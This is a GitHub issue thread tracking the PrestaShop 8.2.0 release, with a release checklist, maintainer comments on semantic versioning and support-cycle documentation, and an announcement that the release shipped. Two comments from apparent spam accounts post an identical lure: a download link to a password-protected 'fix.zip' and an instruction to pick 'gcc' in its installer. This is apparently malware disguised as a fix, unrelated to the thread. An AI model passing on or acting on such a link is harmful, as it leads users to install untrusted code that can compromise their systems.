### ISSUE TITLE
Release 8.2.0 🏇

### ISSUE THREAD

**Issue by matks** [PrestaShop/PrestaShop#36758]
This issue tracks the status of the PrestaShop 8.2.0 release 

# Information

Q                                                              | A
--------------------------------------|---------------
**Type**                                                  |  Minor version
**Build date**                                        |  Septembre 24th
**Milestone**                                         | [8.2.0](https://github.com/PrestaShop/PrestaShop/milestone/106) 
**Delivery date**                                  |  2024-09-26
**Release manager tech**                    |   @matthieu-rolland 
**Release manager product**              |  @ibahloul-ps 
**Release manager QA**                      |  Theodoros

_Nota Bene: the release date may vary, if major bugs are identified during the test phase_

RMT = Release manager tech
RMQ = Release manager QA

# Current status
- [x] Create milestone 

## 1. Development

See below https://github.com/PrestaShop/PrestaShop/pulls?q=is%3Apr+milestone%3A8.2.0

## 2. Preparing the source code for release

- [x] [Preliminary tasks](https://www.prestashop-project.org/maintainers-guide/releasing-prestashop/preliminary-tasks/) **RMT**
  - [x] 1. Make sure the version number has been updated in the Core
  - [ ] ~2. Publish a new version of the classic-theme if needed~
  - [ ] ~3. Then bump the version used in the Core in composer.lock.~
  - [ ] ~4. Update wording catalog in the core if needed~
  - [ ] ~5. Do a Crowdin push.~
  - [x] 6. Perform multiple manual verifications as documented in the release process
  
## 3. Build process
- [x] Create the new version in Addons Marketplace and update native module compatibility
- [x] Prepare communication **Communicator**
- [x] Update the Changelog and Contributors list **RMT**
- [x] Build the zip archive. **RMT**
- [x] QA validation **RMQ** 
- [x] Release new version of autoupgrade if needed. See below
- [x] Update channel.xml with new version of autoupgrade module.
- [x] Release **RMT**
  - [x] Merge the updated Changelog and Contributors list on GitHub.
  - [x] Tag the version using Git and publish the release on GitHub.
- [x] Provide Communicator with up to date informations (contributors list, changelog...) **RMT**
- [x] Communicate 
   - [x] Release note **Communicator**

## 4. After release steps
- [x] Make new version available for upgrade
- [x] Publish Docker image
- [x] Close milestone

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by matks** [comment]
## About PrestaShop 8.2.0

Branch 8.1.x is giving birth to branch 8.2.x so the next version 8 will not be version 8.1.8, it will be version 8.2.0 .

Some changes we would like to deliver with the next 8 version do not fit the criteria for a patch version, so we would like to release them in a 8.2.0 minor version, doing that we follow SemVer.

This version 8.2.0 will be a very light minor version 😉  not like version 8.1.0 which contained hundred of Pull Requests.

Between PrestaShop 8.2.0 and PrestaShop 8.1.0 there should be around twenty Pull Requests. It’s going to be a very light minor version, and thanks to this
- upgrades from 8.1 to 8.2 should be easy
- the release process should be easy

**Comment by kpodemski** [comment]
Following the decision to release PrestaShop 8.2, I recommend we edit the [PrestaShop's release and support cycle](https://www.prestashop-project.org/project-organization/release-cycle/). Information about the impact of having more minor versions regarding patches is especially important.

I [submitted proposed changes](https://github.com/PrestaShop/open-source/pull/273) to the project's website repository.

**Comment by matks** [comment]
## PrestaShop 8.2.0 has been released (on 2024-09-26)

[The release is now done](https://build.prestashop-project.org/). Thank you everyone involved!
